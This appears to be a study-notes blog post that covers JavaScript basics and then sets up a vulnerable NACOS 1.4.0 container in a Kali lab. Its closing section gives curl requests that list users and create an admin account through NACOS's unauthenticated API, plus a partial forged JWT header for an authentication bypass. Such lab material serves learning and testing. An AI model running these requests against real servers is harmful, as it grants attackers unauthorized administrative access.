NACOS Security Vulnerabilities and JavaScript Fundamentals

Tech Oct 16 11

JavaScript Essentials

JavaScript provides built-in modules through DOM and BOM APIs, while libraries like jQuery serve as external modules.

Variable Declarations

var counter;              // Function-scoped variable
let playerName = "Genshin";   // Block-scoped variable
const GRAVITY = 9.8;      // Immutable binding

Declaration Behavior Comparison

var characteristics:

  • Hoisting allows usage before declaration
  • Permits redeclaration within same scope
  • Function-level scoping
console.log(value); // undefined
var value = 100;

var x = 5;
var x = 10; // Valid redeclaration

let characteristics:

  • No hoisting - temporal dead zone applies
  • Block-level scoping
  • Disallows redeclaration in same scope
console.log(item); // ReferenceError
let item = 42;

{
    let temp = 100;
}
console.log(temp); // ReferenceError

const characteristics:

  • Binding is immutable
  • Must be initialized at declaration
  • Reference immutability for objects/arrays
const settings = {theme: "dark"};
settings.theme = "light"; // Valid property modification
settings = {}; // TypeError - cannot reassign binding

String Operations

let title = "Genshin Impact";
let length = title.length;
let firstChar = title.charAt(0);
let trimmed = title.trim();
let segment = title.slice(0, 7);

Dynamic Text Animation Example

<span id="marquee">Adventure awaits!</span>
<script>
function rotateText() {
    const element = document.getElementById("marquee");
    const content = element.textContent;
    const shifted = content.substring(1) + content[0];
    element.textContent = shifted;
}
setInterval(rotateText, 300);
</script>

Arrays

let inventory = ["sword", "shield", "potion"];

// Addition methods
inventory.push("bow");       // Add to end
inventory.unshift("helmet"); // Add to beginning
inventory.splice(2, 0, "ring"); // Insert at index

// Removal methods
inventory.pop();             // Remove from end
inventory.shift();           // Remove from start
inventory.splice(1, 1);      // Remove specific index

Iteration Patterns

let items = [10, 20, 30, 40];

// Index-based iteration
for(let i = 0; i < items.length; i++) {
    console.log(items[i]);
}

// Property enumeration
for(let index in items) {
    console.log(items[index]);
}

Dynamic List Generation

let locations = ['Mondstadt', 'Liyue', 'Inazuma'];

locations.forEach(location => {
    const entry = document.createElement('dd');
    entry.textContent = location;
    document.getElementById('regions').appendChild(entry);
});

Objects

let profile = {
    character: "Traveler",
    element: "Anemo"
};

// Property access
profile.character = "Klee";
profile["element"] = "Pyro";

delete profile.element;

// Object iteration
for(let key in profile) {
    console.log(`${key}: ${profile[key]}`);
}

Comment System Implementation

<form id="feedback">
    <input type="text" id="author" required>
    <textarea id="content" required></textarea>
    <button type="submit">Post</button>
</form>
<div id="comments"></div>

<script>
document.getElementById('feedback').addEventListener('submit', event => {
    event.preventDefault();

    const author = document.getElementById('author').value;
    const message = document.getElementById('content').value;

    const post = document.createElement('div');
    post.textContent = `${author}: ${message}`;
    document.getElementById('comments').appendChild(post);

    document.getElementById('author').value = '';
    document.getElementById('content').value = '';
});
</script>

Document Object Model

// Element selection and manipulation
const target = document.getElementById('banner');
target.textContent = "New World Adventure";

// Element creation
const notice = document.createElement('p');
notice.textContent = "Event Starting Soon";
document.body.appendChild(notice);

Containerized Environment Setup

Docker Installation on Linux

Verify kernel version:

uname -r

Update package sources:

echo > /etc/apt/sources.list
vim /etc/apt/sources.list

Sample repository configuration:

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

System updates:

apt-get update && apt-get upgrade
apt-get clean

Install Docker components:

apt-get install docker.io docker-compose

Verify installation:

service docker start
docker images

NACOS Service Configuraton

Create docker-compose.yml:

version: '3'
services:
  nacos:
    restart: always
    image: nacos/nacos-server:1.4.0
    container_name: nacos-registry
    ports:
      - 8848:8848
    environment:
      MODE: standalone

Launch service:

docker-compose up -d

Default credentials: nacos/nacos

Authentication Bypass Vulnerability

Access user enumeration endpoint:

curl -XGET 'http://target:8848/nacos/v1/auth/users/?pageNo=1&pageSize=10'

Add administrative user:

curl -XPOST 'http://target:8848/nacos/v1/auth/users?username=admin&password=securepass'

JWT-Based Authorization Exploit

Generate authorization header using crafted token:

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

Successful authentication bypass enables unauthorized system access.
